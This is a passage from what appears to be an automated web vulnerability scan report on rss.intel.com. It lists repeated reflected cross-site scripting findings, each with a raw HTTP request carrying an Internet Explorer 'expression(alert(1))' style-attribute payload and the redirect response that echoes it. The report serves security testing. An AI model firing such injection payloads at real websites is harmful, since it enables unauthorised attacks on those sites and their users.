This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/201145d4d"style%3d"x%3aexpression(alert(1))"ddfc2782d6d/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:23 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/201145d4d"style="x:expression(alert(1))"ddfc2782d6d/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172
Content-Length: 219
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/201145d4d"style="x:expression(alert(1))"ddfc2782d6d/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172">
...[SNIP]...

4.60. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 8]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68d4a"style%3d"x%3aexpression(alert(1))"41c87971c29 was submitted in the REST URL parameter 8. This input was echoed as 68d4a"style="x:expression(alert(1))"41c87971c29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/0268d4a"style%3d"x%3aexpression(alert(1))"41c87971c29/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:27 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/0268d4a"style="x:expression(alert(1))"41c87971c29/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172
Content-Length: 219
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/0268d4a"style="x:expression(alert(1))"41c87971c29/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172">
...[SNIP]...

4.61. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 9]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload deb50"style%3d"x%3aexpression(alert(1))"8f86c2e6e9d was submitted in the REST URL parameter 9. This input was echoed as deb50"style="x:expression(alert(1))"8f86c2e6e9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01deb50"style%3d"x%3aexpression(alert(1))"8f86c2e6e9d/chip-shot-intel-renewable-energy-powers-up HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:33 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01deb50"style="x:expression(alert(1))"8f86c2e6e9d/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172
Content-Length: 219
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01deb50"style="x:expression(alert(1))"8f86c2e6e9d/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172">
...[SNIP]...

4.62. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 10]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign

Issue detail

The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8990d"style%3d"x%3aexpression(alert(1))"6a4a1f59ddf was submitted in the REST URL parameter 10. This input was echoed as 8990d"style="x:expression(alert(1))"6a4a1f59ddf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign8990d"style%3d"x%3aexpression(alert(1))"6a4a1f59ddf HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:42 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign8990d"style="x:expression(alert(1))"6a4a1f59ddf?cid=rss-258152-c1-264090
Content-Length: 263
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign8990d"style="x:expression(alert(1))"6a4a1f59ddf?cid=rss-258152-c1-264090">
...[SNIP]...

4.63. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c13a"style%3d"x%3aexpression(alert(1))"dbd34b499c2 was submitted in the REST URL parameter 2. This input was echoed as 3c13a"style="x:expression(alert(1))"dbd34b499c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-2640903c13a"style%3d"x%3aexpression(alert(1))"dbd34b499c2/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:04 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-2640903c13a"style="x:expression(alert(1))"dbd34b499c2
Content-Length: 263
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-2640903c13a"style="x:expression(alert(1))"dbd34b499c2">
...[SNIP]...

4.64. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 542f9"style%3d"x%3aexpression(alert(1))"6ae2d48504d was submitted in the REST URL parameter 3. This input was echoed as 542f9"style="x:expression(alert(1))"6ae2d48504d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264090/newsroom.intel.com542f9"style%3d"x%3aexpression(alert(1))"6ae2d48504d/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:08 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com542f9"style="x:expression(alert(1))"6ae2d48504d/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign
Content-Length: 238
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com542f9"style="x:expression(alert(1))"6ae2d48504d/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign">
...[SNIP]...

4.65. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18b87"style%3d"x%3aexpression(alert(1))"1cf80933b02 was submitted in the REST URL parameter 4. This input was echoed as 18b87"style="x:expression(alert(1))"1cf80933b02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264090/newsroom.intel.com/community18b87"style%3d"x%3aexpression(alert(1))"1cf80933b02/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:12 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community18b87"style="x:expression(alert(1))"1cf80933b02/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090
Content-Length: 263
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community18b87"style="x:expression(alert(1))"1cf80933b02/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090">
...[SNIP]...

4.66. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 5]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da64d"style%3d"x%3aexpression(alert(1))"dba1dcf6eaa was submitted in the REST URL parameter 5. This input was echoed as da64d"style="x:expression(alert(1))"dba1dcf6eaa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroomda64d"style%3d"x%3aexpression(alert(1))"dba1dcf6eaa/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:17 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroomda64d"style="x:expression(alert(1))"dba1dcf6eaa/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090
Content-Length: 263
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroomda64d"style="x:expression(alert(1))"dba1dcf6eaa/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090">
...[SNIP]...

4.67. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 6]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5de8"style%3d"x%3aexpression(alert(1))"b9a36043a42 was submitted in the REST URL parameter 6. This input was echoed as c5de8"style="x:expression(alert(1))"b9a36043a42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blogc5de8"style%3d"x%3aexpression(alert(1))"b9a36043a42/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:23 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blogc5de8"style="x:expression(alert(1))"b9a36043a42/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090
Content-Length: 263
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blogc5de8"style="x:expression(alert(1))"b9a36043a42/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090">
...[SNIP]...

4.68. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 7]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 210fc"style%3d"x%3aexpression(alert(1))"72bb478d645 was submitted in the REST URL parameter 7. This input was echoed as 210fc"style="x:expression(alert(1))"72bb478d645 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011210fc"style%3d"x%3aexpression(alert(1))"72bb478d645/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:27 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011210fc"style="x:expression(alert(1))"72bb478d645/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090
Content-Length: 263
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011210fc"style="x:expression(alert(1))"72bb478d645/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090">
...[SNIP]...

4.69. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 8]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ca69"style%3d"x%3aexpression(alert(1))"d3ef2b7acf6 was submitted in the REST URL parameter 8. This input was echoed as 1ca69"style="x:expression(alert(1))"d3ef2b7acf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/011ca69"style%3d"x%3aexpression(alert(1))"d3ef2b7acf6/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:33 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/011ca69"style="x:expression(alert(1))"d3ef2b7acf6/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090
Content-Length: 263
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/011ca69"style="x:expression(alert(1))"d3ef2b7acf6/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090">
...[SNIP]...

4.70. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 9]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56bbf"style%3d"x%3aexpression(alert(1))"8390e8a9d78 was submitted in the REST URL parameter 9. This input was echoed as 56bbf"style="x:expression(alert(1))"8390e8a9d78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/3156bbf"style%3d"x%3aexpression(alert(1))"8390e8a9d78/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:37 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/3156bbf"style="x:expression(alert(1))"8390e8a9d78/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090
Content-Length: 263
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/3156bbf"style="x:expression(alert(1))"8390e8a9d78/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090">
...[SNIP]...

4.71. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 10]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd2dc"style%3d"x%3aexpression(alert(1))"a09a84ec8e8 was submitted in the REST URL parameter 10. This input was echoed as dd2dc"style="x:expression(alert(1))"a09a84ec8e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-businessdd2dc"style%3d"x%3aexpression(alert(1))"a09a84ec8e8 HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:45 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-businessdd2dc"style="x:expression(alert(1))"a09a84ec8e8?cid=rss-258152-c1-264093
Content-Length: 246
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-businessdd2dc"style="x:expression(alert(1))"a09a84ec8e8?cid=rss-258152-c1-264093">
...[SNIP]...

4.72. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3d82"style%3d"x%3aexpression(alert(1))"a47bdb4daac was submitted in the REST URL parameter 2. This input was echoed as c3d82"style="x:expression(alert(1))"a47bdb4daac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264093c3d82"style%3d"x%3aexpression(alert(1))"a47bdb4daac/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
